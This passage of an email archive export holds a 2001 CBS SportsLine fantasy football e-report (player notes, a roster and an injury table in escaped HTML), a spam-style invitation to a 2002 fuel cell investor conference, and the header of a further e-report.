Galloway has been a disappointment for Fantasy owners this season. Unless you're in a deeper league, starting Galloway during your playoffs isn't recommended.  &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1253&amp;"&gt;&lt;B&gt;Troy Brown&lt;/B&gt;&lt;/A&gt;, WR NE - Houston Big Ballers &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Brown has been an inconsistent Fantasy receiver this year. He may not be a reliable option during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1171&amp;"&gt;&lt;B&gt;Warrick Dunn&lt;/B&gt;&lt;/A&gt;, RB TB - President Taft &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Dunn has been inconsistent this season. He will be a No. 2 back at best during your playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1663&amp;"&gt;&lt;B&gt;Antowain Smith&lt;/B&gt;&lt;/A&gt;, RB NE - Team Dick &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Smith is a must-start player during the Fantasy postseason. Even if his yardage totals aren't good, he is a tremendous TD threat. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1265&amp;"&gt;&lt;B&gt;Keyshawn Johnson&lt;/B&gt;&lt;/A&gt;, WR TB - Orange Roughy &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Johnson has caught a lot of passes this season, but has only one TD reception. Nevertheless, he will still be a reliable receiver in your playoffs.&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=187740&amp;"&gt;&lt;B&gt;_x000D_
Anthony Becht&lt;/B&gt;&lt;/A&gt;, TE NYJ - Free Agent &lt;FONT SIZE=1&gt;Updated 12/21/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Becht hasn't been a consistent target for the Jets this year. He may not be very valuable during the Fantasy playoffs. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=pro-player-updates&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;start=30&amp;"&gt;More Updates&lt;/A&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Teams,&amp;nbsp;Rosters&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;TABLE CELLPADDING=0 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=options-logo&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;"&gt;&lt;IMG BORDER=0 SRC=/var/images/teams/getbad/4-9.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD VALIGN=top&gt;&lt;IMG SRC="http://images.commissioner.com/images/dot_clear.gif" WIDTH=10 HEIGHT=1&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=5&gt;Team Chick&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=owners&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;owner_name=Nicole%20Cortez&amp;"&gt;Nicole Cortez&lt;/A&gt;&lt;BR&gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=owners&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;owner_name=Theresa%20Staab&amp;"&gt;Theresa Staab&lt;/A&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;_x000D_
&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;TM&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Status&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Next&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Bye&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1034&amp;team=4&amp;"&gt;Gannon, Rich&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;OAK&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;TEN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 6&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1782&amp;team=4&amp;"&gt;Barber, Tiki&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;NYG&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;SEA&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 12&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12576&amp;team=4&amp;"&gt;Moss, Randy&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;MIN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;JAC&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 8&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1290&amp;team=4&amp;"&gt;Owens, Terrell&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;SF&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;PHI&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 6&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1291&amp;team=4&amp;"&gt;Rice, Jerry&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;OAK&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;TEN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 6&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12795&amp;team=4&amp;"&gt;Ward, Hines&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;PIT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;DET&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 2&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1377&amp;team=4&amp;"&gt;Stover, Matt&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;BAL&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;K&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;CIN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 13&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=18&amp;team=4&amp;"&gt;Saints&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;NO&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Active&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@TB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 2&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=133260&amp;team=4&amp;"&gt;Couch, Tim&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;CLE&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@GB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 7&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1141&amp;team=4&amp;"&gt;Anderson, Richie&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;NYJ&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@IND&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 11&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1471&amp;team=4&amp;"&gt;Richardson, Tony&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;KC&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;SD&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 10&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1286&amp;team=4&amp;"&gt;Galloway, Joey&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;DAL&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@ARI&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 6&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=12342&amp;team=4&amp;"&gt;Dyson, Kevin&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;TEN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;@OAK&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 3&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1321&amp;team=4&amp;"&gt;Walls, Wesley&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;CAR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;TE&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;STL&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=black&gt;Week 14&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1328&amp;team=4&amp;"&gt;Carswell, Dwayne&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;DEN&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;TE&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;Reserve&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;bye&lt;/TD&gt;&lt;TD class=TD2 ALIGN=middle&gt;&lt;FONT COLOR=red&gt;Week 15&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;/TABLE&gt;&lt;FONT SIZE=2 FACE="Arial, Helvetica"&gt;&lt;BR&gt;Total Active Players: 8&lt;BR&gt;Total Reserve Players: 7&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;NFL Injuries for Team Chick&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Updated&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Team&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Injury&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;_x000D_
Expected Return&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 ALIGN=middle&gt;12/21/01&lt;/TD&gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1290&amp;"&gt;Owens, Terrell&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;SF&lt;/TD&gt;&lt;TD class=TD2 &gt;WR&lt;/TD&gt;&lt;TD class=TD2 &gt;Hip&lt;/TD&gt;&lt;TD class=TD2 &gt;Expected to start&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 ALIGN=middle&gt;12/19/01&lt;/TD&gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1471&amp;"&gt;Richardson, Tony&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;KC&lt;/TD&gt;&lt;TD class=TD2 &gt;RB&lt;/TD&gt;&lt;TD class=TD2 &gt;Shoulder&lt;/TD&gt;&lt;TD class=TD2 &gt;Day to day&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 ALIGN=middle&gt;12/21/01&lt;/TD&gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football291.fantasy.sportsline.com/mp/elink?script=players&amp;league=getbad&amp;owner=98084.5&amp;random=4921&amp;key=1321&amp;"&gt;Walls, Wesley&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 &gt;CAR&lt;/TD&gt;&lt;TD class=TD2 &gt;TE&lt;/TD&gt;&lt;TD class=TD2 &gt;Ankle&lt;/TD&gt;&lt;TD class=TD2 &gt;Expected to play this week&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;/TABLE&gt;&lt;IMG WIDTH=1px HEIGHT=1px SRC="http://football291.fantasy.sportsline.com/mp/open_gif?splnid=0631643c5a9e2a58e2d183ed4ff9fc7c&amp;league=getbad&amp;owner=98084.5&amp;email=3f1a7893c3703d39dbb37c2df5d62c48&amp;sport=football&amp;vend=CBS%20SportsLine.com&amp;product=mgmt&amp;time=20011222&amp;type=ereport&amp;random=4921"&gt;&lt;HR&gt;&lt;CENTER&gt;Copyright 2001 Commissioner.COM Inc and SportsLine.com Inc.&lt;BR&gt;Your site can be reached from &lt;A HREF=http://fantasy.sportsline.com&gt;http://fantasy.sportsline.com&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;FB10SP&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;</t>
  </si>
  <si>
    <t>Thu, 14 Mar 2002 05:58:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'strategicresearchinstitute@sriconference.com'})</t>
  </si>
  <si>
    <t>Fuel Cell Investors To Gather - A Unique Networking Opportunity -_x000D_
 Conference Selling Out!</t>
  </si>
  <si>
    <t xml:space="preserve">Strategic Research Institute Presents:_x000D_
 _x000D_
2ND ANNUAL _x000D_
FUELCELL _x000D_
INVESTOR_x000D_
 A Unique Networking Opportunity To Talk Directly To CEOs Of Virtually All Publicly Traded FC Companies And Other Executives Whose Decisions Can Change The Future Of The Industry!_x000D_
March 26 - 27, 2002 w The Roosevelt Hotel w New York, NY_x000D_
_x000D_
The rapidly expanding fuel industry was recently given yet another boost, as the Bush administration last week abandoned a multi-billion dollar, eight-year project to develop high-mileage gasoline-fueled vehicles and instead is throwing its support behind a plan to develop hydrogen-based fuel cells to power the cars of the future._x000D_
_x000D_
_x000D_
With the highest possible level of speakers in the fuel cell industry, this summit offers unparallel networking potential. Some major blue chip companies will be presenting, among them Air Products, Dupont, GE Equity, General Motors, Ford and Morgan Stanley._x000D_
_x000D_
_x000D_
_x000D_
This event will be a unique opportunity to hear from and talk directly to CEOs of virtually all publicly traded FC companies: Walter (Chip) Schroeder, Proton Energy; H. Frank Gibbard, H Power; Jerry D. Leitman, FuelCell Energy; Bill Acker, Mechanical Technology; Stephen S. Tang, Millennium Cell; Pierre Rivard, Hydrogenics; Robert K. Lifton, Medis Technology; John Donohue, DCH Technology, plus CFOs and Directors of several more fuel cell companies, including Plug Power, Ceramic Fuel Cells and many others. _x000D_
REGISTER NOW!_x000D_
_x000D_
Visit the conference web site: www.srinstitute.com/CR218 &lt;http://www.srinstitute.com/CR218&gt;_x000D_
_x000D_
To register call _x000D_
888-666-8514 (toll free) _x000D_
or +1-646-336-7030, or e-mail to: info@srinstitute.com &lt;mailto:info@srinstitute.com&gt;_x000D_
_x000D_
To discuss sponsorship opportunities e-mail to: mdupre@srinstitute.com &lt;mailto:mdupre@srinstitute.com&gt;_x000D_
_x000D_
For more information contact: cdauer@srinstitute.com &lt;mailto:cdauer@srinstitute.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
Here's What You Will Learn:_x000D_
_x000D_
Big Picture &amp; Big Markets: How to get it? How to get it? How to get there? What are the critical success factors for long-term growth? _x000D_
Market-Driven Product Development: in portable, stationary and automotive arenas _x000D_
Premium Power Markets: Which ones make sense to fuel cell manufacturers? _x000D_
Future Applications: Closer than you think? _x000D_
Solving the Hydrogen Equation: Who is going to finance it? How to find liquid fuels? What role will fuel cells &amp; hydrogen play? _x000D_
_x000D_
_x000D_
Plus, a special session with those first to commercialize DMFC and mirco fuel cells!_x000D_
_x000D_
COME TO SEE WHY 300+ ATTENDED _x000D_
THE 1ST FC INVESTOR CONFERENCE!_x000D_
 _x000D_
Special discounted rates for _x000D_
FC Developers and Government_x000D_
 _x000D_
WWW.SRINSTITUTE.COM/CR218 &lt;http://www.srinstitute.com/CR218&gt;_x000D_
2ND ANNUAL _x000D_
FUELCELL_x000D_
INVESTOR_x000D_
_x000D_
If you would like to be removed from our email list, please send to sri@dmgltd.org &lt;mailto:sri@dmgltd.org?subject=REMOVE&gt; and reply with "Remove" in the subject line._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Wed, 26 Dec 2001 04:58:51 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Evil Empire 12/26/01</t>
  </si>
  <si>
    <t>&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;&lt;html&gt;&lt;HEAD&gt;_x000D_
&lt;!--_x000D_
_x000D_
_x000D_
You are receiving these e-reports because you have signed up for_x000D_
CBS SportsLine.com Fantasy Football.  The default format for these_x000D_
reports is HTML, however if you are reading this text your_x000D_
mail reader is not displaying it as HTML.  To change to_x000D_
text mode, or to customize, reschedule, or turn off these_x000D_
reports please to to the URL below:_x000D_
_x000D_
http://football292.fantasy.sportsline.com/mp/options-ereports?league=ee&amp;owner=96876.9_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--&gt;_x000D_
_x000D_
&lt;BASE HREF="http://football292.fantasy.sportsline.com/mp/"&gt;_x000D_
